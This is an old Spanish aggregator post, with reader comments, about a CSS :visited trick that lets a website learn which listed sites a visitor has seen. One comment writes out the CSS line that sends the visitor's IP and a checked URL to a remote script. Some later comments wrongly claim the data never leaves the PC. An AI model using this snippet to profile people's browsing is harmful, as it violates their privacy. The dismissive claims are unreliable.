Hace 17 años | Por mezvan a kriptopolis.org
Publicado hace 17 años por mezvan a kriptopolis.org

[c&p] Jeremiah Grossman demostró hace meses que es posible que un sitio web sepa por qué otros sitios ha pasado un usuario mediante el uso de JavaScript. Pero ya ni siquiera JavaScript es necesario, porque RSnake se las ha ingeniado para lograr implementar cierta lógica condicional en CSS. Y lo más preocupante es que tanto Explorer 7, como Firefox 2 (Windows y Linux) y Opera 9.10 (Windows y Linux) caen en la trampa

Comentarios

H

El bug tiene tema y no le veo una solución fácil:
">url_a_comprobar

Si visitas una página con ese código y has visitado "url_a_comprobar" pwn3d.php será llamado (al intentar cargarlo como imagen) y tendrán tu ip y el dominio que has visitado.

Si generas una lista de esos links suficientemente grande, puedes obtener una buena parte del historial de la gente...

D

A todos los que supuestamente "no les funciona"... ¡teneis que visitar primero una de esas webs! lol
(comprobado, funciona con: Firefox 2.0.0.1, Konqueror 3.5.6, Opera 9.02, Opera 9.10)

g

Con Konqueror no funciona (es de suponer que tampoco con Safari).

d

una curiosa ocurrencia... si señor

versvs

#6 el problema no es tener una parte importante, sino una parte crítica: ¿Qué tal saber quién visita webs de ultraderecha, de lesbianas o de porno? No es interesante para saber quién usa google, sino para conocer quién visita algún tipo de sitios concreto... ¿te imaginas que pudieran mirarte mal por leer un libro de gloria fuertes? Igual por mirar la web del club de fans de gloria fuertes estás en un aprieto... (ejemplo un poco tonto, pero sirve para la idea que quiero explicar...)

H

No es exactamente tu historial completo. La web atacante tiene que tener una lista de los posibles sitios webs que hayas visitado.
Lo que obtendrá la web atacante será la intersección de su lista con la lista de tu historial.

realar

Mi historial es cero patatero. Hay que luchar contra la lucha por la información privada que se avecina.

r

The following sites were visited:
Visited: http://www.yahoo.com/
Visited: http://www.google.com/

Esto es todo lo que me sale, es normal???

Editado: Ah vale, ya lo entendí...sabe lo que has visitado, de una lista de sitios... en este caso la lista del ejemplo es cortita.

k

Con safehistory ( www.safehistory.com ) parece que se soluciona.
Antes me decía que había visitado x urls, ahora no.

Desde aquí se puede instalar también:
https://addons.mozilla.org/firefox/1502/

Edito: parece que no funciona, no sé por qué antes funcionó.

H

#8 La noticia es cierta.
El CSS se ejecuta en tu PC, claro; pero la imagen falsa se carga desde un servidor remoto y se genera una petición. Ese servidor remoto puede guardar un histórico de peticiones y en esas peticiones aparece el nombre de la imagen (con el dominio) y tu IP. Mira el código que he puesto en #6 : a:visited {background: url(pwn3d.php?tuIP=IP&url=url_a_comprobar)

mr.xkr

El título es erróneo: No sacan tu historial, sacan simplemente si has visitado páginas que ellos deben conocer previamente. Si afecta a nuestra privacidad, pero no es tan grave como parece ser por el título.

jotape

#13 #14
The following sites were visited:
Visited: http://ha.ckers.org/

Pues sí, funciona

m

A seguir usando Mac OS X, y Ubuntu para lo técnico

don_Efe

#18, en la pagina ha.ckers.org/weird/CSS-history.cgi se explica que el plugin safehistory funciona sólo para la versión de javascript del bug, pero esta versión CSS no la detecta.

D

Tanto Opera como Konqueror son vulnerables en mi PC.

agente_naranja

#14, la noticia no es erronea, lo que sería erroneo es el hack en si, y no se puede catalogar de erroneo porque no te funcione...
Y de hecho no es un hack ni de lejos peligroso, o al menos es muy dificil conseguir alguna información vulnerable. Sólo compara las páginas que has visitado con algunas muy comunes, y sabiendo el montón de páginas que hay hoy en día activas en Internet, habría que dedicarle muchisimo tiempo a escanear los links visitados para descubrir alguna cochinadilla...

jesusr

Vaya, todo (o casi, Konqueror no tiene el fallo) es imperfecto. Ahora bien, ¿quien solucionará antes el problema? Yo voto porque será Firefox, es lo que tiene el software libre...

mr.xkr

#23 Es errónea dado que el título dice "Tu historial de navegación, dominio público"

NO es cierto que sea TU historial, es cierto que si sepan de una determinada lista los sitios que has visitado. Como que no habrá direcciones en internet. Es válida para poder ver si has visitado sitios, p.e. de tu competencia, pero tampoco es tan grave. No guardar el historial es una buena forma de evitar este problema. No se puede ser tan hopocondríaco con este tema, ni tampoco quedarse tan corto.

Si considerais esto un grave problema de privacidad, no os imaginais cuanto puede ser de comprometedor que aprueben la TCPA: http://www.againsttcpa.com/

cels

probados ambos (CSS y JS hacks) y ninguno funciona bajo Opera 9.20

R

he pinchado en la demostración y voilaaaaahhhh, es genial, ha descubierto que hoy he visitado GOOGLE!!! que pedazo de herramienta hacking, mala malosa.

D

No funciona con Firefox bajo Ubuntu. Comprobado. Habría que votar errónea.

naorte

Esto no es un fallo ni el historial está en el dominio público: se trata simplemente de un funcionamiento normal de CSS. De la misma forma que podemos hacer que un enlace visitado tenga un color diferente, también podemos hacer que una imagen aparezca al lado, como en la web de prueba. Pero esto solo se ve en el propio PC. Es lo mismo que el código Javascript que te permite ver los archivos de tu PC en una web. Esto no significa que desde fuera te lo puedan ver, vamos, no pueden!

La noticia no es cierta!